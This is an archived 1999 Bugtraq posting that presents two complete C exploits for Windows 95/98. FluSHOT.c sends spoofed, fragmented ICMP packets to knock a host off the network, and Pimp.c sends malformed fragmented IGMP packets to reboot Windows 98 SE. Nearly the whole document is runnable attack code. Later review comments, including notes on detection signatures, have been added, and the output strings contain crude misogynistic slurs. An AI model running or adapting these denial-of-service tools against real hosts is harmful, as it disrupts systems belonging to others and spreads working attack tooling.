
windows_exploits.txt

windows_exploits.txt
Posted Sep 21, 1999

Two exploits for Windows 95/98: one drops the network connection and the other reboots Windows 98 SE.

tags | exploit
systems | windows
MD5 | d8c319f7b5559cb1a6e2da3f68a46284

windows_exploits.txt

Subject:      About IGMP and another exploit for Windows95x/98x
To: BUGTRAQ@SECURITYFOCUS.COM


I got two exploits and tested them...


- The first one is Flushot by DarkShadow. This exploit can drop the network connection on Windows 95 and Windows 98 (First Edition).


- The other one is Pimp by Rob Mosher; this exploit can reboot Windows 98 SE.


I have Red Hat Linux 5.0 installed....


Now... the exploits..


Sorry.. my english is a shit...


Have fun..


----------[FluSHOT.c START CUT HERE]--------------------------------------------------
/* Lags CPU Made By DarkShadow from The flu Hacking Group


Kills Win95-98 machines


*/




#include <stdio.h>


#include <unistd.h>


#include <stdlib.h>


#include <string.h>


#include <sys/types.h>


#include <sys/time.h>


#include <sys/socket.h>


#include <netdb.h>


#include <netinet/in.h>


#include <netinet/ip.h>


#include <netinet/ip_icmp.h>


/* Write the program banner to stdout, followed by trailing blank lines. */
void banner(void)
{
    fputs("Remote Flushot v 1.0\n\n", stdout);
    fputs("\n\n", stdout);
}


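/*
 * Print the command-line help text to stdout.
 *
 * progname: the name the program was started as (argv[0]); it is shown in
 *           the synopsis line. A NULL pointer falls back to "./flushot".
 */
void usage(const char *progname)
{
    printf(" usage:\n");
    /*
     * The original format string hard-coded "./flushot" and had no
     * conversion for progname, so the argument was passed but never
     * printed. Use it, so the synopsis matches how the binary was invoked.
     */
    printf("%s [Spoofed IP] [Destination IP] [# of FLushot to Send]\n",
           progname != NULL ? progname : "./flushot");
    printf(" [Spoofed IP] : ex: 205.56.78.0\n");
    printf(" [Destination IP] : ex: 201.12.3.76\n");
    printf(" [# of FLushot to Send] : 100\n");
    printf("The Flu Hacking Group (c)\n");
    printf("DarkShadow PlimoMan Hack The Planet\n");
}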


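/*
 * Fill *addr with the IPv4 address and port that `name` refers to.
 *
 * name: dotted-quad string or host name.
 * port: port number in host byte order; stored in network byte order.
 * addr: output structure; it is zeroed before being populated.
 *
 * Returns 0 on success, or -1 (after printing a message to stderr) when
 * the name cannot be resolved to an IPv4 address.
 *
 * NOTE(review): inet_addr() is declared in <arpa/inet.h>, which this
 * listing's include block does not pull in.
 */
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
    struct hostent *host;

    memset(addr, 0, sizeof(*addr));
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = inet_addr(name);

    /*
     * INADDR_NONE is the documented failure value of inet_addr(). It is
     * also the value of "255.255.255.255", so that input falls through to
     * the resolver exactly as it did with the original "== -1" test.
     */
    if (addr->sin_addr.s_addr == INADDR_NONE) {
        host = gethostbyname(name);
        if (host == NULL) {
            fprintf(stderr, "ERROR: Unable to resolve host %s\n", name);
            return -1;
        }

        /*
         * The original copied host->h_length bytes into sin_addr without
         * checking the length. Accept only an answer that is IPv4 and
         * exactly the size of sin_addr, so the copy cannot overrun *addr.
         */
        if (host->h_addrtype != AF_INET ||
            host->h_length != (int)sizeof(addr->sin_addr) ||
            host->h_addr_list[0] == NULL) {
            fprintf(stderr, "ERROR: Unable to resolve host %s\n", name);
            return -1;
        }

        memcpy(&addr->sin_addr, host->h_addr_list[0], sizeof(addr->sin_addr));
    }

    addr->sin_port = htons(port);
    return 0;
}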


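/*
 * Internet checksum: the one's complement of the one's-complement sum of
 * the data taken as 16-bit words (the algorithm described in RFC 1071).
 *
 * addr: start of the data to sum. Any object pointer is accepted; the
 *       words are read with memcpy(), so the buffer needs no particular
 *       alignment or type.
 * len:  number of bytes to sum. An odd trailing byte is treated as a
 *       16-bit word whose other byte is zero. Values <= 0 sum nothing.
 *
 * Returns the 16-bit checksum, in the same byte order the words were read
 * in (ready to be stored back into the header it was computed over).
 *
 * Changes from the original listing:
 *  - ISO prototype instead of a K&R definition, so callers that pass a
 *    size_t length get it converted to int instead of relying on an
 *    unprototyped call.
 *  - The accumulator is unsigned, so a long input cannot overflow a
 *    signed int, and the carry fold loops until the sum fits in 16 bits.
 */
unsigned short in_cksum(const void *addr, int len)
{
    const unsigned char *p = addr;
    unsigned long sum = 0;
    unsigned short word;
    int nleft = len;

    /* Add the data up one 16-bit word at a time. */
    while (nleft > 1) {
        memcpy(&word, p, sizeof(word));
        sum += word;
        p += sizeof(word);
        nleft -= 2;
    }

    /* Odd length: place the last byte in the first byte of a zeroed word. */
    if (nleft == 1) {
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }

    /* Fold the carries above bit 15 back into the low 16 bits. */
    while (sum >> 16) {
        sum = (sum >> 16) + (sum & 0xffff);
    }

    return (unsigned short)~sum;
}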


/*
 * Build one buffer holding an IP header, an ICMP header and 8 further
 * bytes, and send it twice on a raw socket as two IP fragments.
 *
 * socket:     descriptor used for both sendto() calls.
 * spoof_addr: value written to the IP source-address field as given.
 * dest_addr:  destination; its sin_addr goes into the IP header and the
 *             structure itself is passed to sendto().
 *
 * Returns 0 after both sends succeed, -1 as soon as a sendto() fails.
 *
 * For anyone writing a detection for this traffic: both datagrams carry
 * IP id 1234 and TTL 30, protocol ICMP, and both have the more-fragments
 * flag set; this function never sends a fragment with that flag clear.
 *
 * NOTE(review): the malloc() result is not checked before use, both early
 * "return(-1)" paths skip free(packet), the local `rc` is never used, and
 * the parameter name `socket` hides the socket() function in this body.
 */
int send_winbomb(int socket,
                 unsigned long spoof_addr,
                 struct sockaddr_in *dest_addr) {
    unsigned char *packet;
    struct iphdr *ip;
    struct icmphdr *icmp;
    int rc;

    /* One allocation for IP header + ICMP header + 8 bytes, all zeroed. */
    packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                     sizeof(struct icmphdr) + 8);
    ip = (struct iphdr *)packet;
    icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
    memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);

    /* First datagram: 20-byte IPv4 header, fragment offset 0. */
    ip->ihl = 5;
    ip->version = 4;
    // ip->tos = 2;
    ip->id = htons(1234);
    /* 0x2000 is the more-fragments bit of the flags/offset field. */
    ip->frag_off |= htons(0x2000);
    // ip->tot_len = 0;
    /* tot_len is still zero from the memset above at this point. */
    ip->ttl = 30;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = spoof_addr;
    ip->daddr = dest_addr->sin_addr.s_addr;
    /* Checksums are taken last, after the fields they cover are set. */
    ip->check = in_cksum(ip, sizeof(struct iphdr));

    /* ICMP type 12 (parameter problem), code 0; checksum over header + 1 byte. */
    icmp->type = 12;
    icmp->code = 0;
    icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
    /* Only IP header + ICMP header + 1 byte of the buffer is sent here. */
    if (sendto(socket,
               packet,
               sizeof(struct iphdr) +
               sizeof(struct icmphdr) + 1,0,
               (struct sockaddr *)dest_addr,
               sizeof(struct sockaddr)) == -1) { return(-1); }

    /*
     * Second datagram reuses the same buffer: total length now filled in,
     * fragment offset 1 (units of 8 bytes, i.e. byte 8), more-fragments
     * still set, and the IP checksum recomputed over the changed header.
     */
    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
    ip->frag_off = htons(8 >> 3);
    ip->frag_off |= htons(0x2000);
    ip->check = in_cksum(ip, sizeof(struct iphdr));
    /* ICMP fields are reset to zero; no ICMP checksum is computed this time. */
    icmp->type = 0;
    icmp->code = 0;
    icmp->checksum = 0;
    /* This send covers the whole buffer (header + ICMP header + 8 bytes). */
    if (sendto(socket,
               packet,
               sizeof(struct iphdr) +
               sizeof(struct icmphdr) + 8,0,
               (struct sockaddr *)dest_addr,
               sizeof(struct sockaddr)) == -1) { return(-1); }

    free(packet);
    return(0);
}


/*
 * Entry point of FluSHOT.c.
 *
 * Expects exactly three arguments: argv[1] is resolved and used as the
 * source address written into each packet, argv[2] is resolved as the
 * destination, and argv[3] is the number of send_winbomb() calls to make.
 *
 * Returns -1 on a usage, socket, resolve or send error; otherwise control
 * runs off the end of main without an explicit return statement.
 *
 * NOTE(review): `sock` is declared unsigned int, so the "< 0" test on the
 * socket() result can never be true and a failed socket() call goes
 * undetected here. argv[3] is parsed with atoi() on every loop iteration
 * and is not validated; the int result is compared against the unsigned
 * counter `i`. The raw socket is never closed.
 */
int main(int argc, char * *argv) {
    struct sockaddr_in dest_addr;
    unsigned int i,sock;
    unsigned long src_addr;

    banner();
    if ((argc != 4)) {
        usage(argv[0]);
        return(-1);
    }

    /* Raw IP socket: the program supplies its own IP header in each packet. */
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        fprintf(stderr,"ERROR: Opening raw socket.\n");
        return(-1);
    }

    /* dest_addr is used as scratch space to resolve the source address first. */
    if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
    src_addr = dest_addr.sin_addr.s_addr;
    if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }

    /*
     * Printed before anything has been sent; the format string has no
     * conversion, so the argv[0] argument is ignored.
     */
    printf("Status: Connected....packets sent.\n",argv[0]);

    for (i = 0;i < atoi(argv[3]);i++) {
        if (send_winbomb(sock,
                         src_addr,
                         &dest_addr) == -1) {
            fprintf(stderr,"ERROR: Unable to Connect To luser.\n");
            return(-1);
        }
        /* 10 ms pause between consecutive pairs of fragments. */
        usleep(10000);
    }
}



----------[FluSHOT.c END CUT HERE]--------------------------------------------------
----------[Pimp.c START CUT HERE]--------------------------------------------------
/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>


/*
 * Local definition of the 8-byte IGMP header written into the packet
 * buffer; this file declares its own layout rather than including a
 * system IGMP header.
 */
struct igmp
{
    unsigned char igmp_type;     /* message type; main() stores 2 here */
    unsigned char igmp_code;     /* code field; main() stores 31 here */
    unsigned short igmp_cksum;   /* checksum field; main() leaves it 0 */
    struct in_addr igmp_group;   /* group address; filled by inet_aton() in main() */
};


/*
 * Print "ERROR: <a>" to stdout and terminate the process with exit(-1).
 *
 * NOTE(review): the expansion is a bare brace block, not do { } while (0),
 * so "if (x) ERROR("..."); else ..." would not compile. Every use in this
 * file is an if without an else, where the trailing ';' is harmless.
 */
#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}


/* Forward declaration; the definition follows main(). */
u_long resolve(char *);


/*
 * Entry point of Pimp.c.
 *
 * Takes one argument, the target host. Builds a single 1500-byte buffer
 * (IP header, the local struct igmp header, then 'A' bytes) and, 15 times
 * at half-second intervals, sends it as four IP fragments of one IGMP
 * datagram.
 *
 * Constants visible here that a detection rule could key on: IP id 69,
 * TTL 255, protocol IGMP, IGMP type 2 / code 31, group 128.1.1.1, a fixed
 * source-address value, and a payload made entirely of 'A' bytes.
 *
 * NOTE(review): none of the sendto() results are checked; s_addr_in has
 * only sin_addr set (sin_family stays 0 from the memset); ip_id, ip_len
 * and ip_src are assigned without htons()/htonl(), unlike ip_off; pkt is
 * never freed; main has no return statement. memset() and inet_aton() are
 * used although <string.h> and <arpa/inet.h> are not in the include list.
 */
int main(int argc, char *argv[])
{
    int nsock, ctr;
    char *pkt, *data;
    struct ip *nip;
    struct igmp *nigmp;
    struct sockaddr_in s_addr_in;

    /* Unbuffered stdout so the progress dots appear as they are printed. */
    setvbuf(stdout, NULL, _IONBF, 0);

    printf("pimp.c by nyt\n");

    if(argc != 2)
        ERROR("usage: pimp <host>");

    /* Raw IP socket: the IP header is supplied by this program. */
    if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        ERROR("could not create raw socket");

    pkt = malloc(1500);
    if(!pkt)
        ERROR("could not allocate memory");

    memset(&s_addr_in, 0, sizeof(s_addr_in));
    memset(pkt, 0, 1500);

    /* Carve the buffer into IP header, IGMP header and payload. */
    nip = (struct ip *) pkt;
    nigmp = (struct igmp *) (pkt + sizeof(struct ip));
    data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
    /* Everything after the two headers is filled with 'A'. */
    memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));

    /* resolve() exits the process itself when the lookup fails. */
    s_addr_in.sin_addr.s_addr = resolve(argv[1]);

    /* Header fields that stay the same for every fragment. */
    nip->ip_v = 4;
    nip->ip_hl = 5;
    nip->ip_tos = 0;
    nip->ip_id = 69;
    nip->ip_ttl = 255;
    nip->ip_p = IPPROTO_IGMP;
    nip->ip_sum = 0;
    nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
    /* Hard-coded source address value; it is not the sender's own address. */
    nip->ip_src.s_addr = 2147100000;
    nigmp->igmp_type = 2;
    nigmp->igmp_code = 31;
    nigmp->igmp_cksum = 0;

    inet_aton("128.1.1.1", &nigmp->igmp_group);

    printf("pimpin' dem trick-ass-bitches");

    for(ctr = 0;ctr < 15;ctr++)
    {
        printf(".");
        /* Fragment 1: byte offset 0, more-fragments set, 1500 bytes sent. */
        nip->ip_len = 1500;
        nip->ip_off = htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
               sizeof(s_addr_in));

        /* Fragment 2: byte offset 1480 (field is in 8-byte units), MF set. */
        nip->ip_off = htons(1480/8)|htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
               sizeof(s_addr_in));

        /* Fragment 3: byte offset 5920, MF set. */
        nip->ip_off = htons(5920/8)|htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
               sizeof(s_addr_in));

        /* Fragment 4: byte offset 7400, MF clear, only 831 bytes sent. */
        nip->ip_len = 831;
        nip->ip_off = htons(7400/8);
        sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
               sizeof(s_addr_in));

        /* Half a second between rounds. */
        usleep(500000);
    }

    printf("*slap* *slap* bitch, who yo daddy\n");
    shutdown(nsock, 2);
    close(nsock);
}


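/*
 * Resolve `host` to an IPv4 address.
 *
 * host: host name or dotted-quad string handed to gethostbyname().
 *
 * Returns the address as an s_addr value (network byte order) widened to
 * unsigned long, which is the type behind the u_long typedef used in the
 * forward declaration. Does not return on failure: a message is printed
 * and the process ends with exit(-1).
 *
 * The original copied sizeof(he->h_addr) bytes, which is the size of a
 * pointer rather than of the address, so on a 64-bit build it read 8
 * bytes from a 4-byte address. The copy is now sized by the destination
 * and only made after checking that the answer really is a 4-byte IPv4
 * address.
 */
unsigned long resolve(char *host)
{
    struct hostent *he;
    struct in_addr ip;

    he = gethostbyname(host);
    if (!he)
    {
        herror("gethostbyname()");
        exit(-1);
    }

    if (he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof(ip) ||
        !he->h_addr_list[0])
    {
        fprintf(stderr, "resolve: no IPv4 address for %s\n", host);
        exit(-1);
    }

    memcpy(&ip, he->h_addr_list[0], sizeof(ip));
    return ip.s_addr;
}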


----------[Pimp.c END CUT HERE]--------------------------------------------------



-- Hector Leon --
darksun@computer-maniacs.com
--CiMOS Computers Rep. Dom.--